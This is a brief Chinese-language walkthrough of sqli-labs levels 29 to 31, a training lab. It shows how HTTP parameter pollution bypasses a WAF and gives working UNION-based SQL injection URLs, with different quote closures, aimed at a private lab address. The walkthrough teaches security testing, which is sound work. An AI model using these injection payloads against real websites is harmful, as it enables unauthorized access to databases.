关于29,30,31这三关基础背景知识详见这篇文章,建议先了解一下:https://blog.csdn.net/nzjdsds/article/details/77758824
注意:这几关需要进入的界面不是index.php,而是login.php
也就是如下图所示,在这几个关卡中同时查询多个id时,生效的是最后一个参数
我们这次查询三个参数,对三个参数分别加单引号
给id=1加,被过滤
给id=2加,无影响
给id=3加,数据库报错,所以我们可以对其进行注入,其实去掉id=3,对id=2注入也可以,说明可以注入的是最后一个参数
在这里如果我们只查询一个参数并对其进行注入的话是无效的
Less 29
我们对第三个参数进行注入
爆库示例
http://192.168.29.21/sqli-labs-master/Less-29/login.php/?id=1&id=2&id=-3' union select 1,database(),3'
剩下的与前几关操作一致,不再多讲~
Less 30
双引号闭合,其他与联合查询注入一致
爆库示例
http://192.168.29.21/sqli-labs-master/Less-30/login.php/?id=1&id=-2" union select 1,database(),3"
Less 31
双引号括号闭合,其他与前面一致
爆库示例
http://192.168.29.21/sqli-labs-master/Less-31/login.php/?id=1&id=-2") union select 1,database(),3--+
这三关是绕过WAF,那就到这里~~~